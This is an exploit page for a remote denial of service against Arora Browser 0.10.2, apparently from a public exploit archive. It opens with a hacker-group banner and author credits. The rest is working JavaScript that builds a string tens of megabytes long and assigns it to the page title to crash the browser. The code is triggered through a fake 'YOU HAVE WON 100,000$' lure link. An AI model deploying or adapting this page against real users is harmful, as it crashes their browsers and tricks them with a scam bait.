Arora Browser version 0.10.2 remote denial of service proof of concept exploit.
87264302a9bde89050e168e8b2b9679fc2b02cd931240a0e758de293a46e69fa
/*
GGGGGG\
GG __GG\
GG / \__| aaaaaa\ rrrrrr\ aaaaaa\ gggggg\ eeeeee\
GG |GGGG\ \____aa\ rr __rr\ \____aa\ gg __gg\ ee __ee\
GG |\_GG | aaaaaaa |rr | \__|aaaaaaa |gg / gg |eeeeeeee |
GG | GG |aa __aa |rr | aa __aa |gg | gg |ee ____|
\GGGGGG |\aaaaaaa |rr | \aaaaaaa |\ggggggg |\eeeeeee\
\______/ \_______|\__| \_______| \____gg | \_______|
gg\ gg |
gggggg |
Info-sec forum: http://garage4hackers.com
[+] Arora Browser v0.10.2 Remote Denial of Service
[+] Author: Prashant a.k.a t3rm!n4t0r
[+] C0ntact: happyterminator@gmail.com
[+] Platform: *nix
[+] Tested on: Ubuntu 11.04
[+] Previously worked for: QTweb, Avant, Midori
[+] Special Greets to: "vinnu",Shreyas and Secfence team
[+] Greets to: fb1h2s, b0nd, Eby,Punter, the_empty,warrior,
abhaythehero,d3c0d3r,d4k357 and all hackers garage crew :)
*/
<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
var buffer = "";
for (var i = 0; i < 8000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 8000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>